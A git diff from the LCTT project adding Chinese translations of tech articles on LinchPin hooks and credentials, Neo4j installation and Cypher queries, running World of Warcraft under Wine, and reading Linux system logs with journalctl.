hook 描述起来非常简单,但理解它们强大的功能却并不简单。这个特性的存在是为了给用户灵活提供那些 LinchPin 开发者所没有考虑到的功能。这个概念可能会带来 ping 一套系统的简单方式,举个实例,比如在运行另一个 hook 之前。
|
||||
|
||||
更仔细地去研究 _工作空间_ ,你可能会注意到 `hooks` 目录,让我们看一下这个目录的结构:
|
||||
|
||||
```
|
||||
$ tree hooks/
|
||||
hooks/
|
||||
├── ansible
|
||||
│ ├── ping
|
||||
│ │ └── dummy_ping.yaml
|
||||
└── shell
|
||||
└── database
|
||||
├── init_db.sh
|
||||
└── setup_db.sh
|
||||
```
|
||||
|
||||
在任何情况下,hook 都可以用在 `PinFile` 中,展示如下:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
hooks:
|
||||
postup:
|
||||
- name: ping
|
||||
type: ansible
|
||||
actions:
|
||||
- dummy_ping.yaml
|
||||
- name: database
|
||||
type: shell
|
||||
actions:
|
||||
- setup_db.sh
|
||||
- init_db.sh
|
||||
```
|
||||
|
||||
基本概念是有三个 postup 动作要完成。Hook 是从上到下运行的,因此,Ansible `ping` 任务将首先运行,紧接着是两个 shell 任务, `setup_db.sh` 和 `init_db.sh`。假设 hook 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。
|
||||
|
||||
### 认证的驱动程序
|
||||
|
||||
在 LinchPin 的最初设计中,开发者决定在 Ansible playbooks 中管理认证;然而,逐渐有更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。
|
||||
|
||||
#### 配置
|
||||
|
||||
让用户使用驱动程序提供的认证方法去完成这个任务。举个实例,如果对于 OpenStack 调用的拓扑,标准方法是使用一个 yaml 文件,或者类似于 `OS_` 前缀的环境变量。`clouds.yaml` 文件是一个 profile 文件的组成部分,它有一个 `auth` 节:
|
||||
|
||||
```
|
||||
clouds:
|
||||
default:
|
||||
auth:
|
||||
auth_url: http://stack.example.com:5000/v2.0/
|
||||
project_name: factory2
|
||||
username: factory-user
|
||||
password: password-is-not-a-good-password
|
||||
```
|
||||
|
||||
更多详细信息在 [OpenStack documentation][21]。
|
||||
|
||||
这个 `clouds.yaml` 或者任何其它认证文件位于 `default_credentials_path` (比如,`~/.config/linchpin`)中,并在拓扑中引用:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: openstack-test
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: linchpin
|
||||
resource_group_type: openstack
|
||||
resource_definitions:
|
||||
- name: resource
|
||||
type: os_server
|
||||
flavor: m1.small
|
||||
image: rhel-7.2-server-x86_64-released
|
||||
count: 1
|
||||
keypair: test-key
|
||||
networks:
|
||||
- test-net2
|
||||
fip_pool: 10.0.72.0/24
|
||||
credentials:
|
||||
filename: clouds.yaml
|
||||
profile: default
|
||||
```
|
||||
|
||||
`default_credentials_path` 可以通过修改 `linchpin.conf` 改变。
|
||||
|
||||
拓扑在底部包含一个新的 `credentials` 节。使用 `openstack`、`ec2`、和 `gcloud` 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的名为 `clouds.yaml` 的文件,并搜索名为 `default` 的 _配置_。
|
||||
|
||||
假设认证被找到并被加载,配给将正常继续。
|
||||
|
||||
### 简化
|
||||
|
||||
虽然 LinchPin 可以完成复杂的拓扑、库存布局、hooks、和认证管理,但是,终极目标是简化。通过使用一个命令行界面的简化,除了提升已经完成的 1.0 版的开发者体验外,LinchPin 将持续去展示复杂的配置可以很简单地去管理。
|
||||
|
||||
### 社区的成长
|
||||
|
||||
在过去的一年中,LinchPin 的社区现在已经有了 [邮件列表][22]和一个 IRC 频道(#linchpin on chat.freenode.net,而且在 [GitHub][23] 中我们很努力地管理它。
|
||||
|
||||
在过去的一年里,社区成员已经从 2 位核心开发者增加到大约 10 位贡献者。更多的人持续参与到项目中。如果你对 LinchPin 感兴趣,可以给我们写信、在 GitHub 上提问,加入 IRC,或者给我们发邮件。
|
||||
|
||||
_这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐城湖市举行。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
Clint Savage - 工作于 Red Hat 是一位负责原子项目(Project Atomic)的高级软件工程师。他的工作是为 Fedora、CentOS、和 Red Hat Enterprise Linux(RHEL)提供自动原子服务器构建。
|
||||
|
||||
-------------
|
||||
|
||||
via: https://opensource.com/article/17/6/linchpin
|
||||
|
||||
作者:[Clint Savage][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/herlo
|
||||
[1]:https://opensource.com/resources/cloud?src=cloud_resource_menu1
|
||||
[2]:https://opensource.com/resources/what-is-openstack?src=cloud_resource_menu2
|
||||
[3]:https://opensource.com/resources/what-is-kubernetes?src=cloud_resource_menu3
|
||||
[4]:https://opensource.com/16/12/yearbook-why-operating-system-matters?src=cloud_resource_menu4
|
||||
[5]:https://opensource.com/business/16/10/interview-andy-cathrow-anchore?src=cloud_resource_menu5
|
||||
[6]:https://opensource.com/article/17/6/linchpin?rate=yx4feHOc5Kf9gaZe5S4MoVAmf9mgtociUimJKAYgwZs
|
||||
[7]:https://www.openwest.org/custom/description.php?id=166
|
||||
[8]:https://www.openwest.org/
|
||||
[9]:https://opensource.com/user/145261/feed
|
||||
[10]:https://www.flickr.com/photos/internetarchivebookimages/14587478927/in/photolist-oe2Gwy-otuvuy-otus3U-otuuh3-ovwtoH-oe2AXD-otutEw-ovwpd8-oe2Me9-ovf688-oxhaVa-oe2mNh-oe3AN6-ovuyL7-ovf9Kt-oe2m4G-ovwqsH-ovjfJY-ovjfrU-oe2rAU-otuuBw-oe3Dgn-oe2JHY-ovfcrF-oe2Ns1-ovjh2N-oe3AmK-otuwP7-ovwrHt-ovwmpH-ovf892-ovfbsr-ovuAzN-ovf3qp-ovuFcJ-oe2T3U-ovwn8r-oe2L3T-oe3ELr-oe2Dmr-ovuyB9-ovuA9s-otuvPG-oturHA-ovuDAh-ovwkV6-ovf5Yv-ovuCC5-ovfc2x-oxhf1V
|
||||
[11]:http://sexysexypenguins.com/posts/introducing-linch-pin/
|
||||
[12]:http://linch-pin.readthedocs.io/en/develop/
|
||||
[13]:https://opensource.com/resources/cloud
|
||||
[14]:http://click.pocoo.org/
|
||||
[15]:https://opensource.com/resources/python
|
||||
[16]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[17]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[18]:https://github.com/CentOS-PaaS-SIG/linchpin/tree/develop/linchpin/examples/topologies
|
||||
[19]:https://github.com/CentOS-PaaS-SIG/linch-pin/tree/develop/linchpin/provision/roles
|
||||
[20]:http://linchpin.readthedocs.io/en/develop/libdocs.html
|
||||
[21]:https://docs.openstack.org/developer/python-openstackclient/configuration.html
|
||||
[22]:https://www.redhat.com/mailman/listinfo/linchpin
|
||||
[23]:https://github.com/CentOS-PaaS-SIG/linch-pin/projects/4
|
||||
[24]:https://opensource.com/users/herlo
|
124
published/20170717 Neo4j and graph databases Getting started.md
Normal file
124
published/20170717 Neo4j and graph databases Getting started.md
Normal file
@ -0,0 +1,124 @@
|
||||
Neo4j 和图数据库起步
|
||||
============================================================
|
||||
|
||||
> 在这个三篇文章系列中的第二篇中,安装 Neo4j 并通过网页客户端来在图中插入和查询数据。
|
||||
|
||||
![Neo4j 和图数据库: 开始](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LIFE_wavegraph.png?itok=z4pXCf_c "Neo4j and graph databases: Getting started")
|
||||
|
||||
在本系列的 [第一篇][8] 中,我们介绍了图数据库中的一些核心概念。在这篇,我们将安装 [Neo4j][9] 并通过网页客户端在图中插入并查询数据。
|
||||
|
||||
可通过 [他们的网站][10] 下载社区版的 Neo4j!你可以下载 Windows 或 OSX 版来测试,也有各 Linux 发行版对应的版本,还有 Docker 版。
|
||||
|
||||
我会在 Debian 9 (stretch) 上安装软件。你可在 [这里][11] 查看完整说明。如果你正在使用 Debian 8 (jessie) 或更老的版本,你可以安装当前的版本,但会出现的一点小问题是 jessie 中并没有安装 Neo4j 运行所需要的 Java 8 环境。
|
||||
|
||||
```
|
||||
wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add - echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install neo4j
|
||||
```
|
||||
|
||||
在我的系统中,出于某些原因,我创建好 `/var/run/neo4j` 之后它就可以很轻松地开始了。Neo4j 给了一个“最大打开文件数”的警告,但因为是测试环境所以我不太需要关心这个问题。Neo4j 默认只会监听本机 localhost 上的连接。如果你的机器是 Debian ,那这很好,但是我的不是。我修改了 `/etc/neo4j/neo4j.conf` ,取消注释了下面这行:
|
||||
|
||||
```
|
||||
dbms.connectors.default_listen_address=0.0.0.0
|
||||
```
|
||||
|
||||
在重启 Neo4j 之后,我可以通过 7474 端口来访问服务器的 Neo4j 服务。默认的用户名和密码是 `Neo4j` 和 `neo4j`; 你需要设置一个新密码,然后会出现初始页面:
|
||||
|
||||
![Installing Neo4J](https://opensource.com/sites/default/files/u128651/article_2_image_1.jpg "Installing Neo4J")
|
||||
|
||||
让我们在 Neo4j 上创建[上篇文章][8]中使用过的图。如下图:
|
||||
|
||||
![Graph database image 2, defining a new type of node](https://opensource.com/sites/default/files/u128651/article_1_image_2.jpg "Graph database image 2, defining a new type of node")
|
||||
|
||||
类似 MySQL 和其它的数据库系统,Neo4j 的各类操作也使用一套查询语句。Cypher,就是 Neo4j 使用的查询语句,但有一些语法区别需要去学习和注意。<ruby>节点<rt>node</rt></ruby>需要用圆括号表示,而<ruby>关系 <rt>relationship</rt></ruby> 需要放在方括号中。因为这是系统中唯二的数据类型,所以了解这些就够了。
|
||||
|
||||
首先,我们创建所有的节点。你需要将下面内容复制黏贴到浏览器顶部区域中,在那里运行查询语句。
|
||||
|
||||
```
|
||||
CREATE (a:Person { name: 'Jane Doe', favorite_color: 'purple' }) CREATE (b:Person { name: 'John Doe' }) CREATE (c:Person { name: 'Mary Smith', favorite_color: 'red', dob: '1992-11-09' }) CREATE (d:Person { name: 'Robert Roe' }) CREATE (e:Person { name: 'Rhonda Roe' }) CREATE (f:Person { name: 'Ryan Roe' }) CREATE (t:City { name: 'Petaluma, CA' }) CREATE (u:City { name: 'Cypress, TX' }) CREATE (v:City { name: 'Grand Prairie, TX' }) CREATE (w:City { name: 'Houston, TX' })
|
||||
```
|
||||
|
||||
注意,在标签前的字符就是变量。这些信息会在出现在各个地方,但我们在这里并不会用到。但你不能不指定相应信息就盲目创建,所以我们使用它们然后就忽略它们。
|
||||
|
||||
在上面一共创建了 10 个节点和 13 个属性。想查看它们? 通过下面语句来匹配查询所有节点:
|
||||
|
||||
```
|
||||
MATCH (n) RETURN n
|
||||
```
|
||||
|
||||
这条语句会返回一个可视化的图。(在应用内,你可以在返回的图中使用”全屏”按钮来查看大图)。你将会看到类似下面的图像:
|
||||
|
||||
|
||||
![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph")
|
||||
|
||||
添加关系需要一点技巧;你需要连接的节点必须是 “<ruby>在限定范围内的<rt>in scope</rt></ruby>”,意思连接的节点是在当前查询语句所限定的范围内的。我们之前使用的查询语句范围太大,所以让我们找到 John 和 Jane 并让他们结婚:
|
||||
|
||||
```
|
||||
MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b)
|
||||
```
|
||||
|
||||
这条语句会创建一个关系并设置两个属性。重新运行该 `MATCH` 语句会显示那个关系。你可以通过鼠标点击任意的节点或关系来查看它们的属性。
|
||||
|
||||
我们来添加其它的关系。比起使用一些列的 `MATCH` 语句,我会一次性做完并从中 `CREATE` 创建多个关系。
|
||||
|
||||
```
|
||||
MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e)
|
||||
```
|
||||
|
||||
重新运行该 `MATCH` 语句,你将会看到下面图像:
|
||||
|
||||
|
||||
![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH")
|
||||
|
||||
如果你喜欢,你可以将节点拖拉成像我之前画的图的样子。
|
||||
|
||||
在这个例子中,我们唯一使用的 `MATCH` 就是 `MATCH` 所有的东西。下面这个查询会返回两个结婚了的夫妻并显示他们之间的关系:
|
||||
|
||||
```
|
||||
MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c
|
||||
```
|
||||
|
||||
在一个更复杂的图中,你可以做更多的细节查询。(LCTT 译注:此例子为 Neo4j 自带例子的)例如,你有关于电影和人的节点,还有像 `ACTED IN`、`DIRECTED`、`WROTE SCREENPLAY` 等属性的关系,你可以运行下面这个查询:
|
||||
|
||||
```
|
||||
MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title
|
||||
```
|
||||
|
||||
……上述是查询和 Mel Gibson 相关的所有影片。但如果你想查询他演过的所有电影,下面这条语句会更有用:
|
||||
|
||||
```
|
||||
MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role
|
||||
```
|
||||
|
||||
还有更多更炫酷的 Cypher 语句可以使用,但我们就简单介绍这些。更详细完整的 Cypher 语句可以在 Neo4j 的[官网][12]上查看, 并且也有很多例子可以练习。
|
||||
|
||||
在此系列的下篇文章中,我们会通过写些 Perl 脚本来展示如何在应用中使用图数据库。
|
||||
|
||||
(图片来源 : opensource.com)
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started
|
||||
|
||||
作者:[Ruth Holloway][a]
|
||||
译者:[happygeorge01](https://github.com/happygeorge01)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/druthb
|
||||
[1]:https://opensource.com/file/363066
|
||||
[2]:https://opensource.com/file/363061
|
||||
[3]:https://opensource.com/file/363071
|
||||
[4]:https://opensource.com/file/363076
|
||||
[5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4
|
||||
[6]:https://opensource.com/users/druthb
|
||||
[7]:https://opensource.com/user/36051/feed
|
||||
[8]:https://linux.cn/article-8728-1.html
|
||||
[9]:https://neo4j.com/
|
||||
[10]:https://neo4j.com/download/community-edition/
|
||||
[11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137
|
||||
[12]:https://neo4j.com/docs/developer-manual/current/cypher/
|
||||
[13]:https://opensource.com/users/druthb
|
||||
[14]:https://opensource.com/users/druthb
|
||||
[15]:https://opensource.com/users/druthb
|
||||
[16]:https://opensource.com/tags/programming
|
@ -1,97 +1,92 @@
|
||||
如何使用 Wine 在 Linux 下玩魔兽世界
|
||||
======
|
||||
|
||||
### 目标
|
||||
**目标:**在 Linux 中运行魔兽世界
|
||||
|
||||
在 Linux 中运行魔兽世界
|
||||
**发行版:**适用于几乎所有的 Linux 发行版。
|
||||
|
||||
### 发行版
|
||||
**要求:**具有 root 权限的 Linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。
|
||||
|
||||
适用于几乎所有的 Linux 发行版。
|
||||
**难度:**简单
|
||||
|
||||
### 要求
|
||||
**约定:**
|
||||
|
||||
具有 root 权限的 linux 系统,搭配上比较现代化的显卡并安装了最新的图形驱动程序。
|
||||
|
||||
### 难度
|
||||
|
||||
简单
|
||||
|
||||
### 约定
|
||||
|
||||
* # - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* $ - 使用普通非特权用户执行
|
||||
* `#` - 要求以 root 权限执行命令,可以直接用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* `$` - 使用普通非特权用户执行
|
||||
|
||||
### 简介
|
||||
|
||||
魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 这段时间以来暴雪从来没有发不过一个官方的 Linux 客户端。 不过还好,我们有 Wine。
|
||||
魔兽世界已经出现差不多有 13 年了,但它依然是最流行的 MMORPG。 不幸的是, 一直以来暴雪从未发布过官方的 Linux 客户端。 不过还好,我们有 Wine。
|
||||
|
||||
### 安装 Wine
|
||||
|
||||
你可以试着用一下普通的 Wine,但它在游戏性能方面改进不大。 Wine Staging 以及带 Gallium Nine 补丁的 Wine 几乎在各方面都要更好一点。 如果你使用了闭源的驱动程序, 那么 Wine Staging 是最好的选择。 若使用了 Mesa 驱动程序, 则还需要打上 Gallium Nine 补丁。
|
||||
|
||||
根据你使用的发行版,参考 [Wine install guide][6] 来安装。
|
||||
根据你使用的发行版,参考 [Wine 安装指南][6] 来安装。
|
||||
|
||||
### Winecfg
|
||||
|
||||
打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 "Staging" 标签页。 这里根据你用的是 staging 版本的 Wine 还是 打了 Gallium 补丁的 Wine 来进行选择。
|
||||
打开 `winecfg`。确保第一个标签页中的 Windows 版本已经设置成了 `Windows 7`。 暴雪不再对之前的版本提供支持。 然后进入 “Staging” 标签页。 这里根据你用的是 staging 版本的 Wine 还是打了 Gallium 补丁的 Wine 来进行选择。
|
||||
|
||||
![Winecfg Staging Settings][1]
|
||||
|
||||
不管是哪个版本的 Wine,都需要启用 VAAPI 以及 EAX。 至于是否隐藏 Wine 的版本则由你自己决定。
|
||||
|
||||
如果你用的是 Staging 补丁,则启用 CSMT。 如果你用的是 Gallium Nine,则启用 Gallium Nine。 但是你不能两个同时启用。
|
||||
|
||||
### Winetricks
|
||||
|
||||
下一步轮到 Winetricks 了。如果你对它不熟,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章[Winetricks guide][7]:
|
||||
下一步轮到 Winetricks 了。如果你对它不了解,那我告诉你, Winetricks 一个用来为 Wine 安装各种 Windows 库以及组件以便程序正常运行的脚本。 更多信息可以阅读我们的这篇文章 [Winetricks 指南][7]:
|
||||
|
||||
![Winetricks Corefonts Installed][2]
|
||||
要让 WoW 以及战网启动程序(Battle.net launcher)工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望在战网启动程序中现实所有互联网上的数据的话,就还需要安装 DLL 部分中的 `ie8`。
|
||||
|
||||
要让 WoW 以及<ruby>战网启动程序<rt>Battle.net launcher</rt></ruby>工作需要安装一些东西。首先,在 “Fonts” 部分中安装 `corefonts`。 然后下面这一步是可选的, 如果你希望来自互联网上的所有数据都显示在战网启动程序中的话,就还需要安装 DLL 部分中的 ie8。
|
||||
|
||||
### Battle.net
|
||||
|
||||
现在你配置好了 Wine 了,可以安装 Battle.net 应用了。 Battle.net 应用用来安装和升级 WoW 以及其他暴雪游戏。 它经常在升级后会出现问题。 因此若它突然出现问题,请查看 [WineHQ 页面][8]。
|
||||
|
||||
毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用
|
||||
毫无疑问,你可以从 [Blizzard 的官网上][9] 下载 Battle.net 应用。
|
||||
|
||||
下载完毕后,使用 Wine 打开 `.exe` 文件, 然后按照安装指引一步步走下去,就跟在 Windows 上一样。
|
||||
|
||||
![Battle.net Launcher With WoW Installed][3]
|
||||
应用安装完成后,登陆/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。
|
||||
|
||||
应用安装完成后,登录/新建帐号就会进入启动器界面。 你在那可以安装和管理游戏。 然后开始安装 WoW。 这可得好一会儿。
|
||||
|
||||
### 运行游戏
|
||||
|
||||
![WoW Advanced Settings][4]
|
||||
在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登陆界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的“Advanced”标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。
|
||||
|
||||
在 Battle.net 应用中点击 “Play” 按钮就能启动 WoW 了。你需要等一会儿才能出现登录界面, 这个性能简直堪称垃圾。 之所以这么慢是因为 WoW 默认使用 DX11 来加速。 进入设置窗口中的 “Advanced” 标签页, 设置图像 API 为 DX9。 保存然后退出游戏。 退出成功后再重新打开游戏。
|
||||
|
||||
现在游戏应该可以玩了。请注意,游戏的性能严重依赖于你的硬件水平。 WoW 是一个很消耗 CPU 的游戏, 而 Wine 更加加剧了 CPU 的负担。 如果你的 CPU 不够强劲, 你的体验会很差。 不过 WoW 支持低特效,因此你可以调低画质让游戏更流畅。
|
||||
|
||||
#### 性能调优
|
||||
|
||||
![WoW Graphics Settings][5]
|
||||
|
||||
很难说什么样的设置最适合你。WoW 在基本设置中有一个很简单的滑动比例条。 它的配置应该要比在 Windows 上低几个等级,毕竟这里的性能不像 Windows 上那么好。
|
||||
|
||||
先调低最可能的罪魁祸首。像抗锯齿和粒子就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。
|
||||
先调低最可能的罪魁祸首。像<ruby>抗锯齿<rt>anti-aliasing</rt></ruby>和<ruby>粒子<rt>particles</rt></ruby>就常常会导致低性能。 另外,试试对比一下窗口模式和全屏模式。 有时候这两者之间的差距还是蛮大的。
|
||||
|
||||
WoW 对 raid 以及 battleground 有专门的配置项。raid 以及 battleground 实例中的内容需要更精细的画面。 有时间 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。
|
||||
WoW 对 “Raid and Battleground” 有专门的配置项。这可以在 “Raid and Battleground” 实例中的内容创建更精细的画面。 有时间 WoW 在开放地图中表现不错, 但当很多玩家出现在屏幕中时就变得很垃圾了。
|
||||
|
||||
实验然后看看哪些配置最适合你的系统。这完全取决于你的硬件和你的系统配置。
|
||||
|
||||
### 最后结语
|
||||
|
||||
从未发不过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。。
|
||||
虽然从未发布过 Linux 版的魔兽世界,但它在 Wine 上已经运行很多年了。 事实上, 它几乎一直都工作的很好。 甚至有传言说暴雪的开发人员会在 Wine 上测试以保证它是有效的。
|
||||
|
||||
虽然有这个说法,但后续的更新和补丁还是会影响到这个古老的游戏, 所以请随时做好出问题的准备。 不管怎样, 就算出问题了,也总是早已有了解决方案, 你只需要找到它而已。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://linuxconfig.org/how-to-play-world-of-warcraft-on-linux-with-wine
|
||||
|
||||
作者:[Nick Congleton][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,59 @@
|
||||
用系统日志了解你的 Linux 系统
|
||||
============
|
||||
|
||||
本文摘自为 Linux 小白(或者非资深桌面用户)传授技巧的系列文章。该系列文章旨在为 LinuxMagazine 发布的第 30 期特别版 “[Linux 入门][2]” (基于 [openSUSE Leap][3] )提供补充说明。
|
||||
|
||||
本文作者是 Romeo S.,她是一名基于 PDX 的企业 Linux 专家,专注于为创新企业提供富有伸缩性的解决方案。
|
||||
|
||||
Linux 系统日志非常重要。后台运行的程序(通常被称为守护进程或者服务进程)处理了你 Linux 系统中的大部分任务。当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为它们做过什么的“历史”信息。这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接。所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg)
|
||||
|
||||
*Photo by Markus Spiske on Unsplash*
|
||||
|
||||
在你的 Linux 计算机上有很多不同的日志。历史上,它们一般以纯文本的格式存储到 `/var/log` 目录中。现在依然有很多日志这样做,你可以很方便的使用 `less` 来查看它们。
|
||||
|
||||
在新装的 openSUSE Leap 42.3 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储。 `systemd`这套系统负责启动守护进程,并在系统启动时让计算机做好被使用的准备。由 `systemd` 记录的日志以二进制格式存储,这使得它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看。好在这个工具已经预安装在你的系统上了:它的名字叫 `journalctl`,而且默认情况下,它会将每个守护进程的所有日志都记录到一个地方。
|
||||
|
||||
只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了。它会用 `less` 分页器显示各种日志。为了让你有个直观的感受, 下面是 `journalctl` 中摘录的一条日志记录:
|
||||
|
||||
```
|
||||
Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM.
|
||||
```
|
||||
|
||||
这条独立的日志记录以此包含了记录的日期和时间、计算机名、记录日志的进程名、记录日志的进程 PID,以及日志内容本身。
|
||||
|
||||
若系统中某个程序运行出问题了,则可以查看日志文件并搜索(使用 `/` 加上要搜索的关键字)程序名称。有可能导致该程序出问题的错误会记录到系统日志中。 有时,错误信息会足够详细到让你能够修复该问题。其他时候,你需要在 Web 上搜索解决方案。 Google 就很适合来搜索奇怪的 Linux 问题。不过搜索时请注意你只输入了日志的实际内容,行首的那些信息(日期、主机名、进程 ID) 对搜索来说是无意义的,会干扰搜索结果。
|
||||
|
||||
解决方法一般在搜索结果的前几个连接中就会有了。当然,你不能只是无脑得运行从互联网上找到的那些命令:请一定先搞清楚你要做的事情是什么,它的效果会是什么。据说,搜索系统日志中的特定条目要比直接描述该故障通用关键字要有用的多。因为程序出错有很多原因,而且同样的故障表现也可能由多种问题引发的。
|
||||
|
||||
比如,系统无法发声的原因有很多,可能是播放器没有插好,也可能是声音系统出故障了,还可能是缺少合适的驱动程序。如果你只是泛泛的描述故障表现,你会找到很多无关的解决方法,而你也会浪费大量的时间。而专门搜索日志文件中的实际内容,你也许会查询出其它人也有相同日志内容的结果。
|
||||
|
||||
你可以对比一下图 1 和图 2。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png)
|
||||
|
||||
图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果。这种搜索通常没什么用。
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png)
|
||||
|
||||
图 2 搜索特定的日志行会显示出精确的,有用的结果。这种搜索通常很有用。
|
||||
|
||||
也有一些系统不用 `journalctl` 来记录日志。在桌面系统中最常见的这类日志包括用于记录 openSUSE 包管理器的行为的 `/var/log/zypper.log`; 记录系统启动时消息的 `/var/log/boot.log` ,开机时这类消息往往滚动的特别快,根本看不过来;`/var/log/ntp` 用来记录 Network Time Protocol (NTP)守护进程同步时间时发生的错误。 另一个存放硬件故障信息的地方是 “Kernel Ring Buffer”(内核环状缓冲区),你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看)。“Kernel Ring Buffer” 存储在内存中,因此会在重启电脑后丢失。不过它包含了 Linux 内核中的重要事件,比如新增了硬件、加载了模块,以及奇怪的网络错误.
|
||||
|
||||
希望你已经准备好深入了解你的 Linux 系统了! 祝你玩的开心!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/
|
||||
|
||||
作者:[chabowski]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[1]:https://www.suse.com/communities/blog/author/chabowski/
|
||||
[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux
|
||||
[3]:https://en.opensuse.org/Portal:42.3
|
||||
[4]:http://www.linux-magazine.com/
|
59
